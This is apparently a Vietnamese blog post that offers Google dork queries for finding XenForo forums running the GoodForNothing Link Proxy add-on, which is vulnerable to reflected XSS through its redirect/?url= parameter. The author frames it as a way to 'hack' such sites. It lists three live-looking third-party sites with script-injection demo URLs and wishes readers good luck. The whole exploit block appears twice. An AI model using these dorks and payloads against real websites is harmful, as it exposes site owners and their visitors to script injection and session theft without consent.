Xuất phát từ bài viết của junookyo tại đây mình nảy sinh một việc đó là thiết kế một dork trên google để hack các website đang sử dụng xenforo và sau khi mày mò cũng đã mò ra một số dork có thể serach ra được một số web dùng xenforo bị lỗi XSS
Exploit: GoodForNothing Link Proxy XSS
Google Dork : intext:XenForo™ ©2011 XenForo Ltd inurl:redirect/?url=
intext:XenForo™ ©2012 XenForo Ltd inurl:redirect/?url=
intext:XenForo™ ©2013 XenForo Ltd inurl:redirect/?url=
intext:XenForo™ ©2014 XenForo Ltd inurl:redirect/?url=
intext:XenForo™ ©2015 XenForo Ltd inurl:redirect/?url=
intext:Powered by GoodForNothing™ Url Redirector
Discovered By : Vô Ưu
Vendor Homepage : vouuvhb.blogspot.com
Demos:
http://luathoc.cafeluat.com/redirect/?url=<script>alert('vô ưu')</script>
https://banlait.xyz/redirect/?url=<script>alert('vô ưu')</script>
http://banthatnhanh.com/redirect/?url=<script>alert('vô ưu')</script>
Chúc các bạn may mắn :)
Exploit: GoodForNothing Link Proxy XSS
Google Dork : intext:XenForo™ ©2011 XenForo Ltd inurl:redirect/?url=
intext:XenForo™ ©2012 XenForo Ltd inurl:redirect/?url=
intext:XenForo™ ©2013 XenForo Ltd inurl:redirect/?url=
intext:XenForo™ ©2014 XenForo Ltd inurl:redirect/?url=
intext:XenForo™ ©2015 XenForo Ltd inurl:redirect/?url=
intext:Powered by GoodForNothing™ Url Redirector
Discovered By : Vô Ưu
Vendor Homepage : vouuvhb.blogspot.com
Demos:
http://luathoc.cafeluat.com/redirect/?url=<script>alert('vô ưu')</script>
https://banlait.xyz/redirect/?url=<script>alert('vô ưu')</script>
http://banthatnhanh.com/redirect/?url=<script>alert('vô ưu')</script>
Chúc các bạn may mắn :)
0 nhận xét:
Post a Comment